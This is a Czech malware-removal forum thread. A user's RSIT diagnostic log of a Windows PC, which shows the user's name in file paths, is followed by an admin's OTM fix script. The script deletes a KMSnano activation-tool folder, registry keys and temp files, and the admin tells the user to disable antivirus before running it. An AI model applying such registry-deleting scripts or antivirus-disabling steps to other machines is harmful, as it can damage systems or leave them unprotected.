[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 4171480]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iaioi2ce.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\MCODS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mcpltsvc]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"SoftwareSASGeneration"=1

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]


[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
"StubPath" = "C:\Program Files (x86)\Google\Chrome\Application\59.0.3071.115\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"VIDC.YUY2"=msyuv.dll
"vidc.i420"=iyuv_32.dll
"msacm.msgsm610"=msgsm32.acm
"msacm.msg711"=msg711.acm
"VIDC.YVYU"=msyuv.dll
"VIDC.YVU9"=tsbyuv.dll
"wavemapper"=msacm32.drv
"midimapper"=midimap.dll
"VIDC.UYVY"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.mrle"=msrle32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msadpcm"=msadp32.acm
"vidc.msvc"=msvidc32.dll
"MSVideo8"=VfWWDM32.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv

====== File associations ======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

====== List of files/folders created in the last 1 month ======

2017-07-17 11:32:35 ----A---- C:\WINDOWS\system32\aspnet_counters.dll
2017-07-17 11:32:29 ----A---- C:\WINDOWS\SYSWOW64\aspnet_counters.dll
2017-07-17 11:31:57 ----A---- C:\WINDOWS\SYSWOW64\msvcp120_clr0400.dll
2017-07-17 11:31:57 ----A---- C:\WINDOWS\system32\msvcr100_clr0400.dll
2017-07-17 11:31:57 ----A---- C:\WINDOWS\system32\msvcp120_clr0400.dll
2017-07-17 11:31:45 ----A---- C:\WINDOWS\SYSWOW64\msvcr100_clr0400.dll
2017-07-17 11:30:29 ----A---- C:\WINDOWS\SYSWOW64\msvcr120_clr0400.dll
2017-07-17 11:30:26 ----A---- C:\WINDOWS\system32\msvcr120_clr0400.dll
2017-07-17 10:51:49 ----D---- C:\rsit
2017-07-12 15:19:59 ----A---- C:\WINDOWS\system32\aepic.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\generaltel.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\devinv.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\centel.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\appraiser.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\aeinv.dll
2017-07-12 15:19:57 ----A---- C:\WINDOWS\system32\invagent.dll
2017-07-12 15:19:57 ----A---- C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-12 15:19:57 ----A---- C:\WINDOWS\system32\acmigration.dll
2017-07-12 08:44:03 ----A---- C:\WINDOWS\system32\mshtml.dll
2017-07-12 08:44:00 ----A---- C:\WINDOWS\system32\jscript9.dll
2017-07-12 08:43:58 ----A---- C:\WINDOWS\SYSWOW64\mshtml.dll
2017-07-12 08:43:55 ----A---- C:\WINDOWS\SYSWOW64\jscript9.dll
2017-07-12 08:43:53 ----A---- C:\WINDOWS\system32\tquery.dll
2017-07-12 08:43:52 ----A---- C:\WINDOWS\SYSWOW64\tquery.dll
2017-07-12 08:43:52 ----A---- C:\WINDOWS\system32\win32k.sys
2017-07-12 08:43:51 ----A---- C:\WINDOWS\system32\ieframe.dll
2017-07-12 08:43:50 ----A---- C:\WINDOWS\SYSWOW64\mssrch.dll
2017-07-12 08:43:50 ----A---- C:\WINDOWS\system32\mssrch.dll
2017-07-12 08:43:49 ----A---- C:\WINDOWS\SYSWOW64\msxml3.dll
2017-07-12 08:43:49 ----A---- C:\WINDOWS\system32\msxml3.dll
2017-07-12 08:43:48 ----A---- C:\WINDOWS\system32\urlmon.dll
2017-07-12 08:43:48 ----A---- C:\WINDOWS\system32\ntoskrnl.exe
2017-07-12 08:43:48 ----A---- C:\WINDOWS\system32\kerberos.dll
2017-07-12 08:43:47 ----A---- C:\WINDOWS\SYSWOW64\kerberos.dll
2017-07-12 08:43:47 ----A---- C:\WINDOWS\system32\drivers\ntfs.sys
2017-07-12 08:43:46 ----A---- C:\WINDOWS\SYSWOW64\urlmon.dll
2017-07-12 08:43:46 ----A---- C:\WINDOWS\SYSWOW64\ieframe.dll
2017-07-12 08:43:45 ----A---- C:\WINDOWS\system32\winresume.exe
2017-07-12 08:43:45 ----A---- C:\WINDOWS\system32\winload.exe
2017-07-12 08:43:44 ----A---- C:\WINDOWS\system32\drivers\http.sys
2017-07-12 08:43:43 ----A---- C:\WINDOWS\system32\certutil.exe
2017-07-12 08:43:43 ----A---- C:\WINDOWS\system32\autoconv.exe
2017-07-12 08:43:42 ----A---- C:\WINDOWS\SYSWOW64\vbscript.dll
2017-07-12 08:43:42 ----A---- C:\WINDOWS\SYSWOW64\untfs.dll
2017-07-12 08:43:42 ----A---- C:\WINDOWS\SYSWOW64\autoconv.exe
2017-07-12 08:43:41 ----A---- C:\WINDOWS\SYSWOW64\certutil.exe
2017-07-12 08:43:41 ----A---- C:\WINDOWS\system32\vbscript.dll
2017-07-12 08:43:41 ----A---- C:\WINDOWS\system32\uReFS.dll
2017-07-12 08:43:41 ----A---- C:\WINDOWS\system32\untfs.dll
2017-07-12 08:43:40 ----A---- C:\WINDOWS\SYSWOW64\uReFS.dll
2017-07-12 08:43:40 ----A---- C:\WINDOWS\system32\termsrv.dll
2017-07-12 08:43:39 ----A---- C:\WINDOWS\SYSWOW64\WSDApi.dll
2017-07-12 08:43:39 ----A---- C:\WINDOWS\system32\srvsvc.dll
2017-07-12 08:43:39 ----A---- C:\WINDOWS\system32\drivers\clfs.sys
2017-07-12 08:43:38 ----A---- C:\WINDOWS\system32\WSDApi.dll
2017-07-12 08:43:38 ----A---- C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-12 08:43:37 ----A---- C:\WINDOWS\system32\drivers\srv.sys
2017-07-12 08:43:36 ----A---- C:\WINDOWS\system32\wininet.dll
2017-07-12 08:43:36 ----A---- C:\WINDOWS\system32\smbwmiv2.dll
2017-07-12 08:43:36 ----A---- C:\WINDOWS\system32\drivers\srvnet.sys
2017-07-12 08:43:35 ----A---- C:\WINDOWS\SYSWOW64\Wldap32.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\SYSWOW64\uudf.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\SYSWOW64\ifsutil.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\system32\ifsutil.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\system32\drivers\storport.sys
2017-07-12 08:43:34 ----A---- C:\WINDOWS\SYSWOW64\ExplorerFrame.dll
2017-07-12 08:43:34 ----A---- C:\WINDOWS\system32\wvc.dll
2017-07-12 08:43:34 ----A---- C:\WINDOWS\system32\uudf.dll
2017-07-12 08:43:34 ----A---- C:\WINDOWS\system32\DAFWSD.dll
2017-07-12 08:43:33 ----A---- C:\WINDOWS\system32\Wldap32.dll
2017-07-12 08:43:33 ----A---- C:\WINDOWS\system32\msinfo32.exe
2017-07-12 08:43:32 ----AC---- C:\WINDOWS\system32\drivers\stornvme.sys
2017-07-12 08:43:32 ----A---- C:\WINDOWS\system32\wdc.dll
2017-07-12 08:43:32 ----A---- C:\WINDOWS\system32\drivers\srv2.sys
2017-07-12 08:43:32 ----A---- C:\WINDOWS\system32\drivers\netio.sys
2017-07-12 08:43:31 ----A---- C:\WINDOWS\SYSWOW64\wininet.dll
2017-07-12 08:43:31 ----A---- C:\WINDOWS\system32\drivers\pdc.sys
2017-07-12 08:43:30 ----A---- C:\WINDOWS\SYSWOW64\wsdchngr.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\SYSWOW64\wdc.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\SYSWOW64\ulib.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\wsdchngr.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\uexfat.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\jscript.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\cnvfat.dll
2017-07-12 08:43:29 ----A---- C:\WINDOWS\SYSWOW64\uexfat.dll
2017-07-12 08:43:29 ----A---- C:\WINDOWS\SYSWOW64\msinfo32.exe
2017-07-12 08:43:29 ----A---- C:\WINDOWS\system32\ulib.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\SYSWOW64\ufat.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\system32\ufat.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\system32\sscore.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\system32\rdsdwmdr.dll
2017-07-12 08:43:25 ----AC---- C:\WINDOWS\system32\drivers\bthpan.sys
2017-07-12 08:43:25 ----A---- C:\WINDOWS\SYSWOW64\wvc.dll
2017-07-12 08:43:25 ----A---- C:\WINDOWS\SYSWOW64\sscore.dll
2017-07-12 08:43:25 ----A---- C:\WINDOWS\SYSWOW64\cnvfat.dll
2017-07-12 08:43:25 ----A---- C:\WINDOWS\system32\snmptrap.exe
2017-07-12 08:43:23 ----A---- C:\WINDOWS\system32\msfeeds.dll
2017-07-12 08:43:23 ----A---- C:\WINDOWS\system32\inetcomm.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\SYSWOW64\msfeeds.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\SYSWOW64\inetcomm.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\SYSWOW64\glcndFilter.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\system32\convert.exe
2017-07-12 08:43:21 ----A---- C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-12 08:43:20 ----A---- C:\WINDOWS\SYSWOW64\Windows.Data.Pdf.dll
2017-07-12 08:43:20 ----A---- C:\WINDOWS\system32\glcndFilter.dll
2017-07-12 08:43:19 ----A---- C:\WINDOWS\SYSWOW64\jscript.dll
2017-07-12 08:43:19 ----A---- C:\WINDOWS\SYSWOW64\ieapfltr.dll
2017-07-12 08:43:19 ----A---- C:\WINDOWS\system32\ieapfltr.dll
2017-07-06 11:54:15 ----A---- C:\WINDOWS\SYSWOW64\ssinstall-uninstall.bat
2017-07-06 11:54:14 ----A---- C:\WINDOWS\SYSWOW64\ssleay32.dll
2017-07-06 11:54:14 ----A---- C:\WINDOWS\SYSWOW64\libeay32.dll
2017-07-06 11:54:13 ----A---- C:\WINDOWS\SYSWOW64\ssins.exe
2017-07-04 18:36:52 ----D---- C:\KVRT_Data
2017-07-04 18:36:22 ----D---- C:\ProgramData\AppData
2017-07-03 14:21:13 ----D---- C:\Program Files (x86)\OpenOffice 4

====== List of files/folders modified in the last 1 month ======

2017-07-17 19:30:18 ----D---- C:\Program Files\trend micro
2017-07-17 19:29:46 ----D---- C:\WINDOWS\Microsoft.NET
2017-07-17 19:29:28 ----SHD---- C:\System Volume Information
2017-07-17 19:21:23 ----D---- C:\WINDOWS\Temp
2017-07-17 19:03:17 ----D---- C:\AdwCleaner
2017-07-17 19:01:37 ----D---- C:\WINDOWS\Prefetch
2017-07-17 18:59:41 ----HD---- C:\ProgramData
2017-07-17 18:59:34 ----D---- C:\Program Files (x86)\TeamViewer
2017-07-17 18:00:02 ----D---- C:\WINDOWS\system32\sru
2017-07-17 17:38:17 ----D---- C:\WINDOWS\system32\config
2017-07-17 17:38:12 ----D---- C:\WINDOWS\WinSxS
2017-07-17 15:06:43 ----D---- C:\WINDOWS\SYSWOW64\en-US
2017-07-17 15:06:43 ----D---- C:\WINDOWS\SysWOW64
2017-07-17 15:06:42 ----RD---- C:\WINDOWS\System32
2017-07-17 15:06:42 ----D---- C:\WINDOWS\system32\en-US
2017-07-17 15:06:42 ----D---- C:\WINDOWS\Inf
2017-07-17 15:06:03 ----D---- C:\Users\Eva Blažková\AppData\Roaming\ClassicShell
2017-07-17 11:29:48 ----D---- C:\WINDOWS\CbsTemp
2017-07-17 07:58:11 ----D---- C:\WINDOWS\system32\drivers
2017-07-17 07:00:03 ----D---- C:\WINDOWS\AppReadiness
2017-07-16 19:52:54 ----D---- C:\WINDOWS\rescache
2017-07-16 07:56:24 ----RSD---- C:\WINDOWS\assembly
2017-07-14 11:59:06 ----D---- C:\WINDOWS\system32\DriverStore
2017-07-13 12:58:38 ----D---- C:\WINDOWS\system32\appraiser
2017-07-13 12:35:04 ----D---- C:\WINDOWS\system32\MRT
2017-07-13 12:29:53 ----AC---- C:\WINDOWS\system32\MRT.exe
2017-07-13 12:01:36 ----D---- C:\ModelHE
2017-07-13 11:55:45 ----SHD---- C:\WINDOWS\Installer
2017-07-13 11:55:44 ----SHD---- C:\Config.Msi
2017-07-12 10:00:31 ----D---- C:\WINDOWS\system32\wbem
2017-07-12 10:00:31 ----D---- C:\WINDOWS\system32\drivers\en-US
2017-07-12 10:00:31 ----D---- C:\WINDOWS\system32\drivers\cs-CZ
2017-07-12 09:26:05 ----D---- C:\WINDOWS\SYSWOW64\Macromed
2017-07-12 09:09:33 ----D---- C:\ProgramData\Microsoft Help
2017-07-12 08:29:54 ----D---- C:\WINDOWS\system32\catroot2
2017-07-10 12:19:19 ----D---- C:\ProgramData\CanonIJPLM
2017-07-10 08:50:44 ----D---- C:\WINDOWS\system32\NDF
2017-07-09 17:30:01 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2017-07-07 15:25:47 ----D---- C:\WINDOWS\system32\Tasks
2017-07-06 12:02:05 ----D---- C:\ProgramData\Adobe
2017-07-06 10:55:08 ----D---- C:\WINDOWS\debug
2017-07-05 13:42:41 ----D---- C:\Program Files (x86)\Google
2017-07-05 12:42:58 ----D---- C:\WINDOWS\system32\Macromed
2017-07-05 12:41:59 ----D---- C:\WINDOWS\SoftwareDistribution
2017-07-05 12:26:15 ----D---- C:\WINDOWS\Tasks
2017-07-05 12:23:28 ----D---- C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz
2017-07-05 12:22:41 ----D---- C:\Program Files (x86)\Adobe
2017-07-05 12:17:34 ----D---- C:\Windows
2017-07-05 11:57:32 ----D---- C:\Program Files (x86)\Mozilla Firefox
2017-07-05 11:43:42 ----RD---- C:\Program Files (x86)
2017-07-04 22:59:19 ----HD---- C:\Program Files\WindowsApps
2017-07-04 22:56:23 ----D---- C:\Program Files (x86)\MyHeritage
2017-07-03 14:21:33 ----RSD---- C:\WINDOWS\Fonts
2017-06-30 02:27:57 ----A---- C:\WINDOWS\SYSWOW64\FlashPlayerApp.exe

File C:\WINDOWS\system32\winlogon.exe is digitally signed
File C:\WINDOWS\system32\wininit.exe is digitally signed
File C:\WINDOWS\explorer.exe is digitally signed
File C:\WINDOWS\SysWOW64\explorer.exe is digitally signed
File C:\WINDOWS\system32\svchost.exe is digitally signed
File C:\WINDOWS\SysWOW64\svchost.exe is digitally signed
File C:\WINDOWS\system32\services.exe is digitally signed
File C:\WINDOWS\system32\User32.dll is digitally signed
File C:\WINDOWS\SysWOW64\User32.dll is digitally signed
File C:\WINDOWS\system32\userinit.exe is digitally signed
File C:\WINDOWS\SysWOW64\userinit.exe is digitally signed
File C:\WINDOWS\system32\rpcss.dll is digitally signed
File C:\WINDOWS\system32\Drivers\volsnap.sys is digitally signed

====== List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled) ======

R0 aswbidsh;aswbidsh; C:\WINDOWS\system32\drivers\aswbidsha.sys [2017-04-26 189768]
R0 aswblog;aswblog; C:\WINDOWS\system32\drivers\aswbloga.sys [2017-04-26 334088]
R0 aswbuniv;aswbuniv; C:\WINDOWS\system32\drivers\aswbuniva.sys [2017-04-26 48528]
R0 aswRvrt;aswRvrt; C:\WINDOWS\system32\drivers\aswRvrt.sys [2017-04-26 75704]
R0 aswVmm;aswVmm; C:\WINDOWS\system32\drivers\aswVmm.sys [2017-04-26 339696]
R0 BTATH_BUS;@oem16.inf,%BTATH_BUS.SVCDESC%;Qualcomm Atheros Bluetooth Bus; C:\WINDOWS\System32\drivers\btath_bus.sys [2014-02-26 35016]
R1 aswbidsdriver;aswbidsdriver; C:\WINDOWS\system32\drivers\aswbidsdrivera.sys [2017-04-26 307736]
R1 aswKbd;aswKbd; C:\WINDOWS\system32\drivers\aswKbd.sys [2017-04-26 32600]
R1 aswRdr;aswRdr; C:\WINDOWS\system32\drivers\aswRdr2.sys [2017-04-26 101152]
R1 aswSnx;aswSnx; C:\WINDOWS\system32\drivers\aswSnx.sys [2017-04-26 1005048]
R1 aswSP;aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [2017-04-28 556784]
R1 vwififlt;@%SystemRoot%\System32\drivers\vwififlt.sys,-259; C:\WINDOWS\system32\DRIVERS\vwififlt.sys [2016-08-13 71680]
R2 aswMonFlt;aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [2017-04-28 128648]
R2 aswStm;aswStm; C:\WINDOWS\system32\drivers\aswStm.sys [2017-04-26 164064]
R2 SSPORT;SSPORT; \??\C:\WINDOWS\system32\Drivers\SSPORT.sys [2009-07-11 11576]
R3 athr;@oem15.inf,%ATHR.Service.DispName%;Qualcomm Atheros Extensible Wireless LAN device driver; C:\WINDOWS\system32\DRIVERS\athwbx.sys [2014-02-14 3888640]
R3 BtFilter;BtFilter; C:\WINDOWS\system32\DRIVERS\btfilter.sys [2014-02-26 598216]
R3 BTHUSB;@bth.inf,%BTHUSB.SvcDesc%;Ovladač rozhraní USB radiostanice Bluetooth; C:\WINDOWS\System32\Drivers\BTHUSB.sys [2014-10-29 81920]
R3 iaioi2c;@oem2.inf,%Driver_Service.Desc%;I2C Controller Service; C:\WINDOWS\System32\drivers\iaioi2ce.sys [2013-11-11 67584]
R3 igfx;igfx; C:\WINDOWS\system32\DRIVERS\igdkmd64.sys [2014-03-07 3729920]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RTKVHD64.sys [2014-03-25 3903320]
R3 IntcDAud;@oem7.inf,%IntcDAud.SvcDesc%;Intel(R) Display Audio; C:\WINDOWS\system32\DRIVERS\IntcDAud.sys [2014-03-07 450520]
R3 iwdbus;@oem10.inf,%iwdbus.SVCDESC%;IWD Bus Enumerator; C:\WINDOWS\System32\drivers\iwdbus.sys [2014-03-01 27032]
R3 RTL8168;@oem11.inf,%rtl8168.Service.DispName%;Realtek 8168 NT Driver; C:\WINDOWS\system32\DRIVERS\Rt630x64.sys [2013-12-18 839896]
R3 RTSPER;@oem14.inf,%Rts5227PER%;Realtek PCIE Card Reader - PER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [2013-12-20 461528]
R3 SynRMIHID;@oem13.inf,%SynRMIHID.SVCDESC%;Synaptics HID Service; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [2014-02-19 42224]
R3 TXEIx64;@oem12.inf,%TEE_SvcDesc%;Intel(R) Trusted Execution Engine Interface ; C:\WINDOWS\System32\drivers\TXEIx64.sys [2014-01-15 88592]
R3 usbvideo;@usbvideo.inf,%USBVideo.SvcDesc%;USB Video Device (WDM); C:\WINDOWS\System32\Drivers\usbvideo.sys [2014-06-21 212736]
R3 vwifimp;@%SystemRoot%\System32\drivers\vwifimp.sys,-261; C:\WINDOWS\system32\DRIVERS\vwifimp.sys [2016-08-13 38912]
S3 aswHwid;aswHwid; C:\WINDOWS\system32\drivers\aswHwid.sys [2017-04-26 38296]
S3 AthBTPort;@oem19.inf,%BTHSUPPORT.SvcDesc%;Qualcomm Atheros Virtual Bluetooth Class; C:\WINDOWS\system32\DRIVERS\btath_flt.sys [2014-02-26 89800]
S3 BTATH_A2DP;@oem18.inf,%BTATH_A2DP.SvcDesc%;Bluetooth A2DP Audio Driver; C:\WINDOWS\system32\drivers\btath_a2dp.sys [2014-02-26 355528]
S3 btath_avdt;@oem18.inf,%btath_avdt.SvcDesc%;Qualcomm Atheros Bluetooth AVDT Service; C:\WINDOWS\system32\drivers\btath_avdt.sys [2014-02-26 118984]
S3 BTATH_HCRP;@oem21.inf,%BTATH_HCRP.SvcDesc%;Bluetooth HCRP Server driver; C:\WINDOWS\System32\drivers\btath_hcrp.sys [2014-02-26 179432]
S3 BTATH_LWFLT;@oem23.inf,%BTATH_LWFLT%;Bluetooth LWFLT Device; C:\WINDOWS\system32\DRIVERS\btath_lwflt.sys [2014-02-26 77464]
S3 BTATH_RCP;@oem25.inf,%BTATH_RCP%;Bluetooth AVRCP Device; C:\WINDOWS\System32\drivers\btath_rcp.sys [2014-02-26 137928]
S3 BthEnum;@bth.inf,%BthEnum.SVCDESC%;Bluetooth Enumerator Service; C:\WINDOWS\System32\drivers\BthEnum.sys [2014-10-29 53248]
S3 BthLEEnum;@bthleenum.inf,%BthLEEnum.SVCDESC%;Bluetooth Low Energy Driver; C:\WINDOWS\system32\DRIVERS\BthLEEnum.sys [2014-03-18 226304]
S3 BthPan;@bthpan.inf,%BthPan.DisplayName%;Bluetooth Device (Personal Area Network); C:\WINDOWS\System32\drivers\bthpan.sys [2017-07-06 119296]
S3 BTHPORT;@bth.inf,%BTHPORT.SvcDesc%;Ovladač portu Bluetooth; C:\WINDOWS\System32\Drivers\BTHport.sys [2015-05-11 1201664]
S3 dot4;@oem42.inf,%Dot4_Name%;MS IEEE-1284.4 Driver; C:\WINDOWS\system32\DRIVERS\Dot4.sys [2012-10-19 151968]
S3 Dot4Print;@oem43.inf,%Dot4Print_Name%;Print Class Driver for IEEE-1284.4; C:\WINDOWS\System32\drivers\Dot4Prt.sys [2012-10-19 27040]
S3 dot4usb;@oem42.inf,%DOT4USB_NAME%;Dot4USB Filter; C:\WINDOWS\system32\DRIVERS\dot4usb.sys [2012-10-19 49056]
S3 GPIO;@oem1.inf,%GPIO.SVCDESC%;Intel SoC GPIO Controller Driver; C:\WINDOWS\System32\drivers\iaiogpioe.sys [2013-11-11 31232]
S3 intaud_WaveExtensible;@oem9.inf,%INTAUD_WEX.SvcDesc%;Intel WiDi Audio Device; C:\WINDOWS\system32\drivers\intelaud.sys [2014-03-01 38296]
S3 LMDriver;@oem20.inf,%LMDriver.SVCDESC%;Launch Manager Wireless Driver; C:\WINDOWS\System32\drivers\LMDriver.sys [2013-07-17 21360]
S3 massfilter;@oem34.inf,%filter.SvcDesc%;MBB Mass Storage Filter Driver; C:\WINDOWS\System32\drivers\massfilter.sys []
S3 RadioShim;@oem20.inf,%RadioShim.SVCDESC%;Shim for HID-KMDF Interface layer; C:\WINDOWS\System32\drivers\RadioShim.sys [2013-07-17 14680]
S3 RFCOMM;@tdibth.inf,%RFCOMM.DisplayName%;Bluetooth Device (RFCOMM Protocol TDI); C:\WINDOWS\System32\drivers\rfcomm.sys [2015-01-30 167424]
S3 usbscan;@sti.inf,%usbscan.SvcDesc%;Ovladač skeneru USB; C:\WINDOWS\System32\drivers\usbscan.sys [2014-10-29 44544]
S4 VBoxAswDrv;VBoxAsw Support Driver; \??\C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys []

====== List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled) ======

R2 602XML Updater;602Updater; C:\Program Files (x86)\Common Files\soft602\602updsvc\602updsvc.exe [2011-10-10 85344]
R2 AdobeARMservice;Adobe Acrobat Update Service; c:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2017-04-25 83056]
R2 AtherosSvc;AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [2014-02-26 319104]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2017-04-26 261712]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; %SystemRoot%\System32\svchost.exe -k utcsvc;"ServiceDll" = %SystemRoot%\system32\diagtrack.dll
R2 GamesAppIntegrationService;GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [2016-03-04 350064]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2017-07-06 321896]
R2 igfxCUIService1.0.0.0;Intel(R) HD Graphics Control Panel Service; C:\WINDOWS\system32\igfxCUIService.exe [2014-03-18 282096]
R2 IJPLMSVC;Canon Inkjet Printer/Scanner/Fax Extended Survey Program; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [2013-06-28 84616]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [2013-07-02 733696]
R2 ssinstall;SInstalátor; C:\WINDOWS\SysWOW64\ssins.exe [2017-07-06 4696960]
R2 TeamViewer;TeamViewer 11; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [2017-04-06 7757040]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2017-04-26 7398336]
R3 FontCache3.0.0.0;@%SystemRoot%\system32\PresentationHost.exe,-3309; C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe [2014-03-18 43696]
R3 osppsvc;Office Software Protection Platform; C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
R3 QASvc;Quick Access Service; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [2014-04-28 457960]
R3 RMSvc;Quick Access RadioMgr Service; C:\Program Files\Acer\Acer Quick Access\RMSvc.exe [2014-04-28 449768]
R3 UEIPSvc;User Experience Improvement Program; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [2014-01-25 222952]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-07-12 272384]
S3 BthHFSrv;@%SystemRoot%\System32\BthHFSrv.dll,-103; %SystemRoot%\System32\svchost.exe -k LocalServiceAndNoImpersonation;"ServiceDll" = %SystemRoot%\System32\BthHFSrv.dll
S3 cphs;Intel(R) Content Protection HECI Service; C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe [2014-03-18 279024]
S3 GamesAppService;GamesAppService; C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2016-03-04 210288]
S3 ICCS;Intel(R) Integrated Clock Controller Service - Intel(R) ICCS; C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe [2012-04-24 169752]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [2013-07-02 822232]
S3 Microsoft SharePoint Workspace Audit Service;Microsoft SharePoint Workspace Audit Service; C:\Program Files\Microsoft Office\Office14\GROOVE.EXE [2013-12-19 50942144]
S3 ose64;Office 64 Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-01-09 174440]
S4 AvastVBoxSvc;AvastVBox COM Service; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe []

-----------------EOF-----------------

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118275
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Prosím o kontrolu logu

#6 Příspěvek od Rudy »

Stáhněte OTM: http://oldtimer.geekstogo.com/OTM.exe a uložte na plochu. Spusťte a do levého okna zkopírujte:
:files
C:\Program Files\KMSnano

:reg
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}]/64
[-HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes\{3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}]/64
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AutoRearm"=-

:commands
[Purity]
[Emptytemp]
[Emptyflash]
a klikněte na >MoveIt!<. Před skenem vypněte antivir a po něm restartujte PC. Dejte nový log RSIT.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

